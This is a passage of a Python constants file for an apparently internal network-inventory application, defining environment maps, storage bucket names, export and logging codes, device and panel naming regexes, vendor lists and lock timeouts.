APP_IDENTITY_DEV: HARDWARE_DEV,\n APP_IDENTITY_STAGING: HARDWARE_STAGING,\n APP_IDENTITY_ACT: HARDWARE_ACT,\n APP_IDENTITY_ACT2: HARDWARE_ACT2,\n APP_IDENTITY_ANTBOM: HARDWARE_ANTBOM,\n APP_IDENTITY_PRODBACKUP: HARDWARE_PRODBACKUP})\n\nPORTS_RESERVATION_SERVICE_BLADE = collections.defaultdict(\n lambda: PORTS_RESERVE_TEST, # Default factory.\n **{\n APP_IDENTITY_DEV: PORTS_RESERVE_DEV,\n APP_IDENTITY_TEST: PORTS_RESERVE_TEST,\n APP_IDENTITY_STAGING: PORTS_RESERVE_STAGING,\n APP_IDENTITY_ACT: PORTS_RESERVE_ACT,\n APP_IDENTITY_ACT2: PORTS_RESERVE_ACT2,\n APP_IDENTITY_ANTBOM: PORTS_RESERVE_ANTBOM,\n APP_IDENTITY_PRODBACKUP: PORTS_RESERVE_PRODBACKUP,\n APP_IDENTITY_PROD: PORTS_RESERVE_PROD\n })\n\nROBO_SERVICE_LOCATION_MAP = collections.defaultdict(\n lambda: ROBO_DEV, # Default factory.\n **{APP_IDENTITY_PROD: ROBO_PROD,\n APP_IDENTITY_DEV: ROBO_DEV,\n APP_IDENTITY_STAGING: ROBO_STAGING,\n APP_IDENTITY_PRODBACKUP: ROBO_PRODBACKUP})\n\n# Shared error messages.\nFILTER_AND_Q_ERROR = 'Request cannot contain both q and filter param.'\n\n# Double Helix rews bucket in Big Store.\nREWS_BUCKET_MAP = collections.defaultdict(\n lambda: 'doublehelix-rews-test', # Default factory.\n **{\n APP_IDENTITY_PROD: 'doublehelix-rews-prod',\n APP_IDENTITY_DEV: 'doublehelix-rews-dev',\n APP_IDENTITY_DEMO: 'doublehelix-rews-demo',\n APP_IDENTITY_TEST: 'doublehelix-rews-test',\n APP_IDENTITY_STAGING: 'doublehelix-rews-staging',\n APP_IDENTITY_PRODBACKUP: 'doublehelix-rews-prodbackup',\n APP_IDENTITY_ACT: 'doublehelix-rews-act',\n APP_IDENTITY_ACT2: 'doublehelix-rews-act2',\n APP_IDENTITY_ANT: 'doublehelix-rews-ant',\n APP_IDENTITY_ANTBOM: 'doublehelix-rews-antbom',\n })\n\n# Toposphere blades.\nTOPOSPHERE_BLADE_MAP = collections.defaultdict(\n lambda: 'blade:toposphere-sandbox-client', # Default factory.\n **{\n APP_IDENTITY_PROD: 'blade:toposphere',\n })\n\nTOPO_BLDG_FILENAME = 'toposphere_buildings.json'\nTOPO_SUBBLDG_FILENAME = 'toposphere_sub_buildings.json'\n# Toposphere building topology model name.\nTOPOSPHERE_BUILDING_MODEL = '/unm/toposphere/corp/buildings'\n# Toposphere subbuilding topology model name.\nTOPOSPHERE_SUBBUILDING_MODEL = '/unm/toposphere/sos_export'\n\n# How long to cache toposphere responses.\nTOPO_MEMCACHE_TIMEOUT = 60 * 60 # 30 minutes.\n\n# SpaceContents keys switch.\nMODEL_SPACECONTENTS = 'SpaceContents'\nMODEL_RACK_ROW = 'RackRow'\nINSERT_ACTION = 'INSERT'\nDELETE_ACTION = 'DELETE'\nTRUE = 'true'\n\n# The setting key to enable/disable UNM export. Value TRUE/FALSE.\nUNM_EXPORT_ENABLED = 'UNM_EXPORT_ENABLED'\n\n# If true, verbose error logging. Can generate *lots* of messages. If False or\n# omitted, no verbose logging.\nUNM_EXPORT_VERBOSE_LOGGING = 'UNM_EXPORT_VERBOSE_LOGGING'\n\n# If true, enable and report full export memory usage. If False or omitted,\n# disabled.\nUNM_EXPORT_ENABLE_FULL_EXPORT_MEMORY_MEASUREMENT = (\n 'UNM_EXPORT_ENABLE_FULL_EXPORT_MEMORY_MEASUREMENT')\n\n# The setting entity key name for the UNM export proxy server.\n# Each instance (prod, staging, demo, ...) can have a distinct value.\nUNM_EXPORT_PROXY_URL = 'UNM_EXPORT_PROXY_URL'\n\n# Set this to an int > 0 to override the default shard count for sharded full\n# export entities.\nUNM_EXPORT_SHARD_COUNT = 'UNM_EXPORT_SHARD_COUNT'\n\n# UNM export logging severity codes.\nUNM_LOG_INFO = 'INFO'\nUNM_LOG_WARNING = 'WARNING'\nUNM_LOG_ERROR = 'ERROR'\n\n# UNM export operation codes\nUNM_EXPORT_UPDATE = 'UPDATE'\nUNM_EXPORT_RENAME = 'RENAME'\nUNM_EXPORT_DELETE = 'DELETE'\nUNM_EXPORT_CLEAN_RELATIONSHIPS = 'CLEANREL'\n\n# UNM 'operation' fields for streamz\nUNM_OP_PIPELINE = 'Pipeline' # Success/failure for an entire pipeline.\n# kind field is type of pipeline, and for\n# full export root how it was initiated.\n# Remaining operations give success/warning/error by entity kind when doing\n# a specific operation. The 'kind' field is the entity kind.\nUNM_OP_CHANGE_UPDATE = 'ChangeUpdate' # Updates of the given entity kind\nUNM_OP_CHANGE_DELETE = 'ChangeDelete' # Deletes of the given entity kind\nUNM_OP_CHANGE_RENAME = 'ChangeRename' # Renames of the given entity kind\nUNM_OP_CHANGE_CLEAN_RELATIONSHIPS = 'ChangeClean' # Clean_relationships of the\n# given entity kind\nUNM_OP_FULL_EXPORT = 'FullExport' # Full exports of the given entity kind\n\n# UNM pipeline types. These are the 'kind' streamz field for\n# operation=UNM_OP_PIPELINE.\n# Full export root pipeline. Also gives who initiated the full export:\nUNM_EXPORT_MANUAL = 'FullExportManual' # From DH admin console\nUNM_EXPORT_AUTOMATIC = 'FullExportAuto' # From proxy server request\nUNM_EXPORT_BIG_UPDATE = 'FullExportBigUpdate' # From too-big update\n# Full export child pipelines:\nUNM_PIPE_METROS_POPS = 'Metros/Pops'\nUNM_PIPE_LOGICAL_DEVICES = 'LogicalDevices'\nUNM_PIPE_ALL_SPACES = 'Buildings/SubBuildings/Floors/Spaces'\nUNM_PIPE_RACKS = 'Racks'\nUNM_PIPE_CHASSIS = 'Chassis'\nUNM_PIPE_PATCH_PANELS = 'PatchPanels/Ports'\nUNM_PIPE_PATCH_PANELS_SHARD = 'PatchPanels/Ports_Shard'\nUNM_PIPE_CIRCUITS = 'Circuits'\nUNM_PIPE_DEVICE_CONNECTIVITY = 'DeviceConnectivity'\n# Update pipeline:\nUNM_PIPE_UPDATE = 'Update'\n\n# For operations UNM_OP_CHANGE_UPDATE, UNM_OP_CHANGE_DELETE,\n# UNM_OP_CHANGE_RENAME, UNM_OP_CHANGE_CLEAN_RELATIONSHIPS, and\n# UNM_OP_FULL_EXPORT, the 'kind' field is the entity type, currently one of:\n# MODEL_METRO, MODEL_POP, MODEL_LOGICAL_DEVICES, MODEL_VENDOR, MODEL_BUILDING,\n# MODEL_SUBBUILDING, MODEL_FLOOR, MODEL_SPACE, MODEL_RACK, MODEL_UNM_CHASSIS,\n# MODEL_UNM_PATCH_PANEL, MODEL_PORT, MODEL_PORT_RESERVATION, MODEL_CIRCUIT,\n# MODEL_ACT_PATH_TX, MODEL_UNM_DEVICE_CONNECTIVITY\n\n# The 'status' streamz field is one of\nUNM_STATUS_SUCCESS = 'Success' # Successful pipeline or entity.\nUNM_STATUS_FAILURE = 'Failure' # Only for operation UNM_OP_PIPELINE\n# Remaining two are for operations other than UNM_OP_PIPELINE:\nUNM_STATUS_WARNING = 'Warnings'\nUNM_STATUS_ERROR = 'Errors'\n# NOTE THAT SUCCESS, WARNING, AND ERROR ARE MUTUALLY DISTINCT. Each exported\n# entity will fall in one and only one status. Entities exported with status\n# UNM_STATUS_WARNING are exported; those with UNM_STATUS_ERROR are not.\n\n# Examples:\n# (operation, kind, status) =\n# (UNM_OP_PIPELINE, UNM_EXPORT_MANUAL, UNM_STATUS_SUCCESS)\n# gives the count of successful runs of the full export root pipeline when\n# manually initiated.\n#\n# (operation, kind, status) =\n# (UNM_OP_PIPELINE, UNM_PIPE_PATCH_PANELS_SHARD, UNM_STATUS_FAILURE)\n# gives the count of failed runs of shard pipelines for PatchPanels/Ports.\n#\n# (operation, kind, status) =\n# (UNM_OP_PIPELINE, UNM_PIPE_UPDATE, UNM_STATUS_SUCCESS)\n# gives the count of successful runs of the Update pipeline.\n#\n# (operation, kind, status) =\n# (UNM_OP_CHANGE_UPDATE, MODEL_POP, UNM_STATUS_ERROR)\n# gives the count of Pops which encountered errors during an update operation to\n# insert or change a Pop.\n#\n# (operation, kind, status) =\n# (UNM_OP_CHANGE_RENAME, MODEL_UNM_CHASSIS, UNM_STATUS_SUCCESS)\n# gives the count of UNM Chassis (DH devices which aren't patch panels) which\n# were succcessfully renamed.\n#\n# (operation, kind, status) =\n# (UNM_OP_FULL_EXPORT, MODEL_UNM_PATCH_PANEL, UNM_STATUS_WARNING)\n# gives the count of exported PatchPanels and their ports with warnings during a\n# full export.\n\n# Appengine User constants.\nUSER_CONTEXT_FIELDS = [\n 'AUTH_DOMAIN', 'USER_EMAIL', 'USER_ID', 'FEDERATED_IDENTITY',\n 'FEDERATED_PROVIDER'\n]\n\n# Authz constants.\nAUTH_METHOD_HEADER = 'HTTP_X_DH_OVERRIDE_AUTH_METHOD'\nAUTH_METHOD_COOKIE = 'cookie'\nAUTH_METHOD_COOKIE_FIRST = 'cookie-first'\nAUTH_METHOD_REST = 'rest'\n\n# Email Template for ribbon publish.\nRIBBON_PUBLISH_EMAIL_TEMPLATE = {\n 'name': 'publish_ribbon',\n 'description': 'Email template for ribbon publish.',\n 'to': [],\n 'cc': [],\n 'subject': 'Ribbon published by {{user}}',\n 'body': ''\n 'The ribbon has been modified and published by {{user}}.'\n '',\n}\n\nSEND_DEV_NOTIFICATIONS = 'SEND_DEV_NOTIFICATIONS'\nDH_DEV_NOTIFY_ADDRESS = 'DH_DEV_NOTIFY_ADDRESS'\n\n# Pluggable devices key to look for in application settings.\nPLUGGABLE_DEVICES = 'PLUGGABLE_DEVICES'\n\n# Regex for Metro name.\nMETRO_NAME_RE_STRING = r'(\\d{4}-\\d{2}-\\d{2})?[A-Z]{3}'\nMETRO_NAME_RE = re.compile(r'^%s$' % METRO_NAME_RE_STRING)\n\n# Regex for Pop name.\nPOP_NAME_RE_STRING = METRO_NAME_RE_STRING + r'(?:0[1-9]|[1-9][0-9]|[1-9]\\d{2})'\nPOP_NAME_RE = re.compile(r'^%s$' % POP_NAME_RE_STRING)\n\n# Regex for Vendor name.\nVENDOR_CODE_RE = re.compile(r'^[A-Z0-9]{5}$')\n\n# Regex for name of patch panels.\n# The regexes produce these capturing groups:\n# 1) The name of the panel.\n# 2) The sequence number of the panel.\n# Optionally\n# 3) For corp panels the rews-id of the building.\n\n# Corp Panel naming rules are relaxed to allow a '-' or a '.' delimiter.\n# This allows existing malformed panel names using a '.' delimiter to be\n# considered when naming new panels so that sequence numbers are not re-used.\n# Corp panel name example: pp34-us-svl-mp5\n# Corp panel with malformed name: pp16-svl-mp5 (note no us-); i.e. the\n# panel creation predates the rename of the building rews-id to add the us-\n# prefix.\n# Corp panel with '.' in the name: pp16.us-svl-mp5 (note '.').\n# Collecting groups: name, sequence, rews-id.\nCORP_PANEL_NAME_RE = re.compile(\n r'^((?:PP|pp)([0-9]{1,3})(?:-|\\.)((?:\\w{2}-)*\\w{3}-[\\w-]+))')\n\n# Hwops non ngf name examples: spp40, pp41.\n# Groups: name, sequence.\nHWOPS_NON_NGF_PANEL_NAME_RE = re.compile(r'([csg]?pp(\\d+))')\n\n# Disable netcracker sync.\nNC_SYNC = 'NC_SYNC'\nFALSE = 'false'\n\n# Release email notification address.\nRELEASE_NOTIFY_TO_ADDRESS = 'RELEASE_NOTIFY_TO_ADDRESS'\nRELEASE_NOTIFY_REPLY_ADDRESS = 'RELEASE_NOTIFY_REPLY_ADDRESS'\nDEFAULT_RELEASE_NOTIFY_TO_ADDRESS = 'double-helix-team@google.com'\nDEFAULT_RELEASE_NOTIFY_REPLY_ADDRESS = ('DoubleHelix Discuss '\n '')\nRELEASE_NOTE_ITEM_PREFIX = r'* '\nRELEASE_NOTE_RAPID_MAX_CLS = 'RELEASE_NOTE_RAPID_MAX_CLS'\nRELEASE_NOTE_RAPID_RPC_TIMEOUT = 'RELEASE_NOTE_RAPID_RPC_TIMEOUT'\nRELEASE_NOTE_RAPID_RELEASE_LIMIT = 'RELEASE_NOTE_RAPID_RELEASE_LIMIT'\nDH_BUG_LINK = r'http://go/double-helix-bug'\n\n# Email template name constants.\nEMAIL_TEMPLATE_BTP_SUMMARY_REPORT = 'BTP_SUMMARY_REPORT'\nEMAIL_TEMPLATE_VERIFY_PATHS_COUNT = 'VERIFY_PATHS_COUNT'\n\n# Email package constants.\nEMAIL_BUCKET_NAME = 'doublehelixemail'\nRIVER_MINE_EMAIL = ('rm_rpts_to_netops ')\n\n# Transport InfraCap.\nTOTAL_INFRA_CAP_QUERY = 'TotalInfraCap_'\n\n# Double Helix Tables for BigQuery.\nEXPORT_BQ_DATASET = 'EXPORT_BQ_DATASET'\nEXPORT_CSV_TARGETS = 'EXPORT_CSV_TARGETS'\nEXPORT_BQ_TARGETS = 'EXPORT_BQ_TARGETS'\nEXPORT_BQ_EXCLUDED_KINDS = 'EXPORT_BQ_EXCLUDED_KINDS'\n\n# PathElement L1 Transport Vendors.\nPE_VENDOR_ALU = 'alcatel-lucent'\nPE_VENDOR_BTI = 'bti'\nPE_VENDOR_CIE = 'ciena'\nPE_VENDOR_INF = 'infinera'\nPE_VENDOR_NSN = 'siemens'\nPE_VENDOR_SUP = 'supernova'\nPE_VENDOR_SIE = PE_VENDOR_NSN\nPE_L1_VENDORS = [PE_VENDOR_ALU, PE_VENDOR_BTI, PE_VENDOR_CIE, PE_VENDOR_INF,\n PE_VENDOR_SUP, PE_VENDOR_NSN]\n\n# Various representation of devices in Device.description/Part__name.\nDEVICE_VENDOR_ALU = 'alcatel[- ]*lucent|alu'\nDEVICE_VENDOR_JDSU = 'jdsu'\n\n# Manufacturer representation.\nMANUFACTURE_ALU = PE_VENDOR_ALU\nMANUFACTURE_BTI = PE_VENDOR_BTI\nMANUFACTURE_CIE = PE_VENDOR_CIE\nMANUFACTURE_INF = PE_VENDOR_INF\nMANUFACTURE_NSN = 'nokia siemens networks'\nMANUFACTURE_SIE = MANUFACTURE_NSN\nMANUFACTURE_SUP = PE_VENDOR_SUP\nMANUFACTURE_UTP = 'google'\n\n# PathElement Interface Components.\nPE_INTF_CHASSIS = 'chassis'\nPE_INTF_LINECARD = 'linecard'\nPE_INTF_MODULE = 'module'\nPE_INTF_PORT = 'port'\n\n# Device name delimeters.\nDEV_NAME_DELIMITERS = r'-: '\nDEV_NAME_DELIMITERS_INFINERA = r'-: \\.'\n\n# Device Reconciliation.\nDEVICE_RECON_DEV_NAME_OPT_OUT_REGEX = 'DEVICE_RECON_DEV_NAME_OPT_OUT_REGEX'\nDEVICE_RECON_DEV_TYPE_OPT_OUT_REGEX = 'DEVICE_RECON_DEV_TYPE_OPT_OUT_REGEX'\nDEVICE_RECON_PART_NAME_OPT_IN_REGEX = 'DEVICE_RECON_PART_NAME_OPT_IN_REGEX'\nDEVICE_RECON_RESET_SEQUENCE = 'DEVICE_RECON_RESET_SEQUENCE'\nDEVICE_RECON_MULTI_CHASSIS_DEV_TYPES = 'DEVICE_RECON_MULTI_CHASSIS_DEV_TYPES'\nDEVICE_RECON_NETWORKING_POPT_TYPE_REGEX = (\n 'DEVICE_RECON_NETWORKING_POPT_TYPE_REGEX')\n\n# Email Subscriptions.\nCREATION_NOTIFICATION_EMAILS = 'CREATION_NOTIFICATION_EMAILS_'\n\n# View constants.\nJSON_CONTENT_TYPE = 'application/json; charset=utf-8'\n\n# Service account suffix.\nSA_ACCOUNT_SUFFIX = 'gserviceaccount.com'\n\n# Cache key qualifiers.\nPART_NAME_UNIQUE_CHECK = 'Part.name-uniquecheck'\n\n# Spectrum frequency digits.\nSPECTRUM_FREQ_DIGITS = 4\n\n# Force init of SpectrumDesign to set templates.\nSPECTRUM_DESIGN_FORCE_INIT_TEMPLATE = 'SPECTRUM_DESIGN_FORCE_INIT_TEMPLATE'\n\n# Default power consumption for Parts.\nDEFAULT_POWER_CONSUMPTION = 0.0\n\n# Power fields in searching Part model for power rollups.\nPARTS_POWER_FIELDS = ['nebs_25c_watts',\n 'nebs_40c_watts',\n 'nebs_55c_watts',\n 'tested_80f_watts',\n 'tested_90f_watts',\n 'tested_100f_watts',\n 'actual_power_w']\n\n# Maximum number of children to search for child Part in Device Templates.\nMAX_DEVICEPART_LEVEL_SEARCH = 10\nMIN_RU = 0.5\n\n# The name of a setting in the admin UI, a list of log_codes that will not\n# genetate emails.\nSETTING_LOGGING_MUTE = 'LOGGING_MUTE'\n\n# The name of a setting in the admin UI, int, duration in seconds over which to\n# debounce emails\nERROR_LOGGING_DEBOUNCE_TIME = 'ERROR_LOGGING_DEBOUNCE_TIME'\n\n# Default value for ERROR_LOGGING_DEBOUNCE_TIME setting.\nDEFAULT_ERROR_LOGGING_DEBOUNCE_TIME = 60 * 5\n\nFLOOR_NUMBER = 'floor_number'\n\n# Circuit constants.\nCIRCUIT_FORCE_INIT = 'CIRCUIT_FORCE_INIT'\nCIRCUIT_PE_TO_CE_FILTER_POP_A = 'CIRCUIT_PE_TO_CE_FILTER_POP_A'\nCIRCUIT_ID_RESET_SEQUENCE = 'CIRCUIT_ID_RESET_SEQUENCE'\n\nCIRCUIT_ID_PREFIX_FOR_CHIPMUNK = 'C'\nCIRCUIT_ID_PREFIX_FOR_DOUBLEHELIX = 'D'\nCIRCUIT_ID_DELIM = '-'\nCIRCUIT_ACT_PATH_NOTE = 'ACT path'\nCIRCUIT_PORT_NAME_PREFIX = r'port-'\nCIRCUIT_PORT_NAME_ALPHA_NUMERIC_REGEX = r'^([A-Z]+)(\\d+)$'\nCIRCUIT_RAW_PATH_DELIM = ':'\nCIRCUIT_RAW_PATH_WITH_HWOPS = 'CIRCUIT_RAW_PATH_WITH_HWOPS'\nCIRCUIT_ACT_PATH_BUCKET = 'doublehelix-act-path-'\nCIRCUIT_ACT_UNM_PATH_MODEL = 'UNM_PATHS_MODEL'\n\n# Settings related to ACT circuit.\nACT_SETTING_STOAT_RPC_DEADLINE = 'ACT_SETTING_STOAT_RPC_DEADLINE'\nACT_SETTING_STOAT_TRANSIENT_ERRORS = 'ACT_SETTING_STOAT_TRANSIENT_ERRORS'\nACT_SETTING_UNM_PATHS_BATCH_SIZE = 'ACT_SETTING_UNM_PATHS_BATCH_SIZE'\n\nACT_TEST_EK_PHYSICAL_PACKET_LINKS = 'ACT_TEST_EK_PHYSICAL_PACKET_LINKS'\nACT_TEST_PATHS_MODEL_FILE_NAME = 'ACT_TEST_PATHS_MODEL_FILE_NAME'\n\nCHIPMUNK_PROXY_BLADE = 'blade:stoat-chipmunk-proxy-prod'\nCHIPMUNK_SANDBOX_BLADE = 'blade:stoat-chipmunk-proxy-sandbox'\nPATH_VALIDATION_BLADE = 'blade:stoat-prod-path-validation'\nDISABLE_STOAT_VALIDATION_SETTING = 'DISABLE_STOAT_VALIDATION'\nUSE_STOAT_PROD_PROXY_IN_NON_PROD_SETTING = 'USE_STOAT_PROD_PROXY_IN_NON_PROD'\n\nPORT_STATUS_UPDATE_MUTEX_EXP_TIME_SEC = (\n 'PORT_STATUS_UPDATE_MUTEX_EXP_TIME_SEC')\nPORT_STATUS_UPDATE_MUTEX_EXP_TIME_SEC_DEFAULT = 300\nPORT_STATUS_UPDATE_MUTEX_ACQUIRE_TIME_SEC = (\n 'PORT_STATUS_UPDATE_MUTEX_ACQUIRE_TIME_SEC')\nPORT_STATUS_UPDATE_MUTEX_ACQUIRE_TIME_SEC_DEFAULT = 900\n\nCIRCUIT_PARENT_UPDATE_MUTEX_EXP_TIME_SEC = (\n 'CIRCUIT_PARENT_UPDATE_MUTEX_EXP_TIME_SEC')\nCIRCUIT_PARENT_UPDATE_MUTEX_EXP_TIME_SEC_DEFAULT = 300\nCIRCUIT_PARENT_UPDATE_MUTEX_ACQUIRE_TIME_SEC = (\n 'CIRCUIT_PARENT_UPDATE_MUTEX_ACQUIRE_TIME_SEC')\nCIRCUIT_PARENT_UPDATE_MUTEX_ACQUIRE_TIME_SEC_DEFAULT = 900\n\nCIRCUIT_PARENT_CREATE_MUTEX_EXP_TIME_SEC = (\n 'CIRCUIT_PARENT_CREATE_MUTEX_EXP_TIME_SEC')\nCIRCUIT_PARENT_CREATE_MUTEX_EXP_TIME_SEC_DEFAULT = 100\nCIRCUIT_PARENT_CREATE_MUTEX_ACQUIRE_TIME_SEC = (\n 'CIRCUIT_PARENT_CREATE_MUTEX_ACQUIRE_TIME_SEC')\nCIRCUIT_PARENT_CREATE_MUTEX_ACQUIRE_TIME_SEC_DEFAULT = 100\n\n# Port reservations.\nPORT_RESERVATION_MUTEX_EXP_TIME_SEC = (\n 'PORT_RESERVATION_MUTEX_EXP_TIME_SEC')\nPORT_RESERVATION_MUTEX_EXP_TIME_SEC_DEFAULT = 600\nPORT_RESERVATION_MUTEX_ACQUIRE_TIME_SEC = (\n 'PORT_RESERVATION_MUTEX_ACQUIRE_TIME_SEC')\nPORT_RESERVATION_MUTEX_ACQUIRE_TIME_SEC_DEFAULT = 600\nNOT_FOUND = 'Not found'\n\n# Capacity\nCAPACITY_TRANSIT_SITE = 'site'\n\n# Constants key for rack copy parameters.\nSOURCE_KEY_NAME = 'source_key_name'\nTARGET_SPACE_KEY_NAME = 'target_space_key_name'\nNUMBER_OF_RACKS = 'number_of_racks'\nNEW_RACK_STATUS = 'new_rack_status'\nTARGET_NAME = 'target_name'\n\n# Setting constant for groups with default write access.\nLDAP_GROUPS_DEFAULT_WRITE = 'LDAP_GROUPS_DEFAULT_WRITE'\nEVERYONE_DEFAULT_READ = '%everyone'\nALL_LDAP_GROUPS = 'LDAP_GROUPS'\nREAD_OP = 'read'\nWRITE_OP = 'write'\n\n# Floor name formats.\nBASEMENT_NAME_FORMAT = '%s.B%d'\nBASEMENT_SUBBUILDING_NAME_FORMAT = '%s.' + BASEMENT_NAME_FORMAT\nFLOOR_NAME_FORMAT = '%s.F%d'\nFLOOR_SUBBUILDING_NAME_FORMAT = '%s.' + FLOOR_NAME_FORMAT\n\n# Actions.\nDELETED = 'deleted'\n\n# Settings for admin groups for updating permissions.\nLIST_ADMIN_GROUPS_PERMISSIONS_UPDATE = 'LIST_ADMIN_GROUPS_PERMISSIONS_UPDATE'\nDEFAULT_ADMIN_GROUPS_PERMISSIONS_UPDATE = ['doublehelix-admin']\n\n# Setting name of list of email addresses that should receive emails\n# about \"empty\" metadata that can be deleted.\nCLEAN_METADATA_EMAIL_RECIPIENTS = 'CLEAN_METADATA_EMAIL_RECIPIENTS'\n\n# Building.\nBUILDING_NAME_FORMAT = '%s%d'\n\n# Space.\nSPACE_NAME_FORMAT = '%s.S%d'\nSPACE_DELIMITER = '.S'\n\n# SubBuilding FQN format.\nSUBBUILDING_FQN_FORMAT = '%s:%s'\n\n# Vendor Patch Panel and Splice Closure name format.\nVENDOR_CATEGORY_NAME_FORMAT = '%s-%s'\n\nCOPPER_PANEL_NAME_FORMAT = VENDOR_CATEGORY_NAME_FORMAT\n\nCOMMISSIONING_STATUS = 'commissioning_status'\n\nPROJECT_ID_PATTERN = re.compile(r'^(prj|del|req|pgm|tsk)-\\d{1,6}$')\n\n# Mail template names\nBOM_CANCEL = 'BOM_CANCEL'\nBOM_ORDER = 'BOM_ORDER'\nBOM_REVIEW = 'BOM_REVIEW'\nCLEAN_METADATA = 'CLEAN_METADATA'\nCLEAN_ENTITIES = 'clean_entities'\nENTITY_SUBSCRIPTION = 'ENTITY_SUBSCRIPTION'\nKIND_CREATION_NOTIFICATION = 'KIND_CREATION_NOTIFICATION'\nLOG_SERVICE_EMAIL_TEMPLATE = 'LOG_SERVICE'\nORDER_STATUS_CHANGE = 'ORDER_STATUS_CHANGE'\nORDER_CURRENT_COMMIT_DATE_CHANGE = 'ORDER_CURRENT_COMMIT_DATE_CHANGE'\nORDER_ONSITE_REQUEST_DATE_CHANGE = 'ORDER_ONSITE_REQUEST_DATE_CHANGE'\nORDER_ITEM_CANCEL = 'ORDER_ITEM_CANCEL'\nORDER_ITEM_CURRENT_COMMIT_DATE_CHANGE = 'ORDER_ITEM_CURRENT_COMMIT_DATE_CHANGE'\nORDER_ITEM_ONSITE_REQUEST_DATE_CHANGE = 'ORDER_ITEM_ONSITE_REQUEST_DATE_CHANGE'\nORDER_STATUS_VALUES = ['Received', 'Scheduled', 'Hold', 'Canceled',\n 'ReleasedToWarehouse', 'ShipPerCommitDate',\n 'ApprovedForPartialShipping', 'Shipped', 'Delivered']\n\n# Device naming related constants.\n# Space function values in the db.\nSPACE_FUNCTION_VALUE_SERVER_FLOOR = 'DC Server Floor'\nSPACE_FUNCTION_VALUE_SSNR = 'SSNR'\nSPACE_FUNCTION_VALUE_CNR = 'CNR' # Logic uses 'in' to handle both CCNR/CNR.\nSPACE_FUNCTION_VALUE_CCNR = 'CCNR'\nSPACE_FUNCTION_VALUE_CORP = 'Corp'\nSPACE_FUNCTION_VALUE_POE = 'Point Of Entry'\n# Enable GTAPE and FSA when requested.\nSPACE_FUNCTION_VALUE_GTAPE = '-do-not-match' # 'Gtape'\nSPACE_FUNCTION_VALUE_FSA = '-do-not-match' # 'Fsa'\n\n# Space function prefix used for naming the device.\nSPACE_FUNCTION_PREFIX_SERVER_FLOOR = 'SPP'\nSPACE_FUNCTION_PREFIX_SSNR = 'PP' # No prefix before PP.\nSPACE_FUNCTION_PREFIX_CNR = 'CPP'\nSPACE_FUNCTION_PREFIX_GTAPE = 'GPP'\nSPACE_FUNCTION_PREFIX_FSA = 'FPP'\n\n# Mapping of space function naming codes to space function values in db.\nSPACE_FUNCTION_DICT = dict(zip(\n (SPACE_FUNCTION_PREFIX_SERVER_FLOOR,\n SPACE_FUNCTION_PREFIX_SSNR,\n SPACE_FUNCTION_PREFIX_CNR, # Shared for both CNR and CCNR.\n SPACE_FUNCTION_PREFIX_GTAPE,\n SPACE_FUNCTION_PREFIX_FSA),\n (SPACE_FUNCTION_VALUE_SERVER_FLOOR,\n SPACE_FUNCTION_VALUE_SSNR,\n SPACE_FUNCTION_VALUE_CNR,\n SPACE_FUNCTION_VALUE_GTAPE,\n SPACE_FUNCTION_VALUE_FSA)))\n\n# Abbreviations used in the Port Capacity and Usage report.\n# At this time only one is abbreviated.\nSPACE_FUNCTION_ABBREVIATIONS = dict(zip(\n (SPACE_FUNCTION_VALUE_SERVER_FLOOR,\n SPACE_FUNCTION_VALUE_SSNR,\n SPACE_FUNCTION_VALUE_CNR,\n SPACE_FUNCTION_VALUE_CCNR,\n SPACE_FUNCTION_VALUE_CORP,\n SPACE_FUNCTION_VALUE_GTAPE,\n SPACE_FUNCTION_VALUE_FSA),\n ('SF',\n SPACE_FUNCTION_VALUE_SSNR,\n SPACE_FUNCTION_VALUE_CNR,\n SPACE_FUNCTION_VALUE_CCNR,\n SPACE_FUNCTION_VALUE_CORP,\n SPACE_FUNCTION_VALUE_GTAPE,\n SPACE_FUNCTION_VALUE_FSA)))\n\n# Automated device naming is dependent on the rmu.\nMAX_RMU = 45\nMAX_NGF_RAILS = 2\n# This pair of constants determine the name of the HWOPS device.\nRMUS = (36, 29, 22, 15, 8, 1) # The code depends on decreasing order.\nHWOPS_RACK_NAMES = ['ABCDEF', 'GHIJKL']\n# Rack type required for HWOPS Splice Closure naming and fqn.\nRACK_OMX_CABINET_PREFIX = 'cabinet OMX'\n\nSEQUENCING_ATTR_FORMAT = '%s%06d'\n\n# References constants.\nREFERENCE_CLUSTER = 'cluster'\nREFERENCE_CLUSTER_ID = 'cluster_id'\nREFERENCE_FUNCTION = 'function'\nREFERENCE_LEVEL = 'level'\nREFERENCE_METRO_PAIR = 'metro_pair'\nREFERENCE_METRO_SCOPE = 'metro_scope'\nREFERENCE_NEIGHBORHOOD = 'neighborhood'\nREFERENCE_POP_SCOPE = 'pop_scope'\n\nREFERENCE_DEVICE = 'device'\nREFERENCE_INTER_METRO = 'inter-metro'\nREFERENCE_METRO = 'metro'\nREFERENCE_NAME = 'name'\nREFERENCE_PATH = 'path'\nREFERENCE_PEER = 'peer'\nREFERENCE_POP = 'pop'\nREFERENCE_ROLE = 'role'\nREFERENCE_SITE = 'site'\nREFERENCE_TRANSIT = 'transit'\n\nREFERENCE_B2_NETWORK = 'b2'\nREFERENCE_B4_NETWORK = 'b4'\n\n# Constants for fallout.\nRUNTIME_ERROR = '__runtime__'\nRUNTIME = 'RUNTIME'\nWARNING = 'WARNING'\nERROR = 'ERROR'\nVALIDATOR_CONTROLLER = 'CONTROLLER'\nVALIDATOR_METADATA = 'METADATA'\nFALLOUT_FIELDS = 'FALLOUT_FIELDS'\n\n# Building constants.\nBUILDING_TYPE_GOOGLE_DATA_CENTER = 'Google Data Center'\n\n# Supply Chain constants.\nLABELS = 'labels'\nPIPELINE_ID = 'pipeline_id'\n\n# Bazooka constants.\nGUNS = 'GUNS'\nPARENT_GUNS = 'PARENT_GUNS'\nPARENT_KEY_NAME = 'parent_key_name'\nBZ_DELETE_SYNC_HISTORY = 'BZ_DELETE_SYNC_HISTORY'\n\n# DataPropagation Constants.\nDPEVENT_VALUECHANGED = 'value_changed'\nDPEVENT_VALUEADD = 'value_added'\nDPEVENT_VALUEDEL = 'value_deleted'\nDPEVENT_VALUEINC = 'value_increased'\nDPEVENT_VALUEDEC = 'value_decreased'\nDPMETA_TRIGGER = 'trigger'\n\n# Fiber connection constants.\nBATCH_FIBER_CONNECTIONS_REQUEST = 'fiber_connections'\nFIBER_CONNECTION = 'FiberConnection'\nA_SPLICE_KEY_NAME = 'a_splice_key_name'\nSTRAND_SPLICE_LIST = 'strand_splice_list'\nSTRAND_KEY_NAME = 'strand_key_name'\nSPLICE_KEY_NAME = 'splice_key_name'\nFIBER_CONNECTION_FIELDS = (A_SPLICE_KEY_NAME, 